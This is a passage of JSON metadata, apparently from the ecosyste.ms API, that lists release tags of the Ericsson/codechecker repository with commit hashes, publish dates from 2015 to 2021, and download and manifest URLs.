m/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","sha":"267e9cb77e55f77a457b3b1f2f3660f35564939e","kind":"commit","published_at":"2021-01-08T11:03:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0-hotfix1/manifests"},{"name":"v6.15.0","sha":"131861b7e94298f58cad883a533814573b89a0f3","kind":"commit","published_at":"2020-11-12T23:55:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.0/manifests"},{"name":"v6.14.0","sha":"644f900e80e2053cdb7d69eee3dfa34e622c185c","kind":"commit","published_at":"2020-09-11T13:12:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.14.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.14.0/manifests"},{"name":"v6.13.0","sha":"17678b103375a9dbff6e69328d0996d54de78ef3","kind":"commit","published_at":"2020-07-10T13:24:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.13.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.13.0/manifests"},{"name":"v6.12.1","sha":"be4c6ac31f125be8432589ea9e9e5b1bbd838d22","kind":"commit","published_at":"2020-06-12T11:46:39.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.1/manifests"},{"name":"v6.12.0","sha":"ecccb6308db0a16d80bb6273280d482576d28d8b","kind":"commit","published_at":"2020-05-14T17:59:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.12.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.12.0/manifests"},{"name":"v6.11.1","sha":"9bb0047368707a18efaca3a207dc8227c8e19b9e","kind":"commit","published_at":"2020-02-12T23:12:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.1/manifests"},{"name":"v6.11.0","sha":"65a042f1ad0dec5581d54cb13396d201a573c0b2","kind":"commit","published_at":"2019-12-12T16:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.11.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.11.0/manifests"},{"name":"v6.10.1","sha":"d3928e30d25bd10da977d2d1119f300a30179cc0","kind":"commit","published_at":"2019-10-09T14:33:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.1/manifests"},{"name":"v6.10.0","sha":"28cb13900c6e2ada55f469d267e05cab9844a97a","kind":"commit","published_at":"2019-07-11T18:00:44.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.10.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.10.0/manifests"},{"name":"v6.9.1","sha":"197579e082c64e42043683b4e14ae2228a5c7d89","kind":"commit","published_at":"2019-04-11T13:22:48.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.1/manifests"},{"name":"v6.9.0","sha":"03351d259b47a57d0c0daebf2a2b00149ea37298","kind":"commit","published_at":"2019-02-08T14:26:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.9.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.9.0/manifests"},{"name":"v6.8.1","sha":"e8b4c6172b45428f997c0e7f37891e11ae312180","kind":"commit","published_at":"2018-11-08T10:10:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.1/manifests"},{"name":"v6.8.0","sha":"2bd99a0b24b4b62fb85992f94ab682c4a9ddc362","kind":"commit","published_at":"2018-09-11T11:33:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.8.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.8.0/manifests"},{"name":"v6.7.1","sha":"968bd5ae5f82fe2d5d329005a2e7748c1200d8fc","kind":"commit","published_at":"2018-06-08T09:08:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.1/manifests"},{"name":"v6.7.0","sha":"9c4f1c514517af66c92e8b73332a79f2adf69e73","kind":"commit","published_at":"2018-05-16T11:22:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.7.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.7.0/manifests"},{"name":"v6.6.0","sha":"d507de883bd29bdc8221e8ecb74c9d1117ad5867","kind":"commit","published_at":"2018-03-22T14:30:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.6.0/manifests"},{"name":"v6.5.1","sha":"fd2df3820f3985e4b2e2b576d0cc9aa9c2474348","kind":"commit","published_at":"2018-02-22T16:01:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5.1/manifests"},{"name":"v6.5","sha":"7370d62dccac3c5ce2771764fa92b8e3bc22bbac","kind":"commit","published_at":"2018-02-07T12:01:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.5/manifests"},{"name":"v6.4","sha":"32ea3cf57eb71255307c065ff8bac6513e0064b9","kind":"commit","published_at":"2018-01-11T14:04:15.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.4/manifests"},{"name":"v6.3","sha":"44c2a7740fa27b9459c40daea2b7836b1c8ca250","kind":"commit","published_at":"2017-12-11T19:02:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.3/manifests"},{"name":"v6.2.1","sha":"174807916c5df8cd80bb08d5f11ac6a49f9e91bf","kind":"commit","published_at":"2017-11-27T16:06:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2.1/manifests"},{"name":"v6.2","sha":"b5ef68f0049ce63a767d82ca602b470ad3f5e758","kind":"commit","published_at":"2017-11-15T16:54:58.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.2/manifests"},{"name":"v6.1.1","sha":"64e128e075defb1e05002ecef481ca120d79fb84","kind":"commit","published_at":"2017-10-27T14:25:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1.1/manifests"},{"name":"v6.1","sha":"ab67d2626297da41ec42afa2cbb404538069db1f","kind":"commit","published_at":"2017-10-13T16:22:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.1/manifests"},{"name":"v6.0.1","sha":"f7506fde033e6f57af6612847b447af69077ac8c","kind":"commit","published_at":"2017-10-02T09:28:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0.1/manifests"},{"name":"v6.0","sha":"666452b9ab4fc97438ac2c45166def3bd3269971","kind":"commit","published_at":"2017-09-18T22:19:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.0/manifests"},{"name":"v5.10","sha":"927979c4eee9f53f5fec79fba3e1be7c606c599c","kind":"commit","published_at":"2017-08-09T18:31:55.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.10","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.10/manifests"},{"name":"v5.9","sha":"ebb1d0330efa1da5712a01c92e0c004aba46bd05","kind":"commit","published_at":"2017-07-14T14:09:07.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.9","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.9/manifests"},{"name":"v5.8","sha":"e8f7d02769a613286c1749d70495ba6a41f7427c","kind":"commit","published_at":"2017-07-07T12:32:03.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.8","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.8/manifests"},{"name":"v5.7.1","sha":"2eca2df6a9d0f5482c1783f063568de5c1ddbe5d","kind":"commit","published_at":"2017-02-09T17:03:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7.1/manifests"},{"name":"v5.7","sha":"1ce7ccbefb1212726331a1fcde4dd37a17cdaccf","kind":"commit","published_at":"2017-01-11T17:17:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.7/manifests"},{"name":"v5.6","sha":"e1b0157ad9f61a946fa0343708be7336cf1a6314","kind":"commit","published_at":"2016-11-15T09:20:43.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.6/manifests"},{"name":"v5.5","sha":"c7bafa16fdaf48ed7a890aea002ae0275e32d963","kind":"commit","published_at":"2016-08-30T10:06:53.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.5/manifests"},{"name":"v5.4","sha":"bcc8c663294739c3946e6cd147e0f98fa0e2d57f","kind":"commit","published_at":"2016-08-05T10:43:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.4/manifests"},{"name":"v5.3","sha":"902c6cf189d747faae5684c4f3f790224dde5eab","kind":"commit","published_at":"2016-04-14T15:55:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.3/manifests"},{"name":"5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/5.2/manifests"},{"name":"v5.2","sha":"13cd6b405ed50ed5865c486eda44bf7e7d52b929","kind":"commit","published_at":"2016-02-17T12:35:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.2/manifests"},{"name":"v5.1","sha":"ab6c82930bde31e558ca20790df7a701e04ed7e6","kind":"commit","published_at":"2015-11-26T13:16:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v5.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito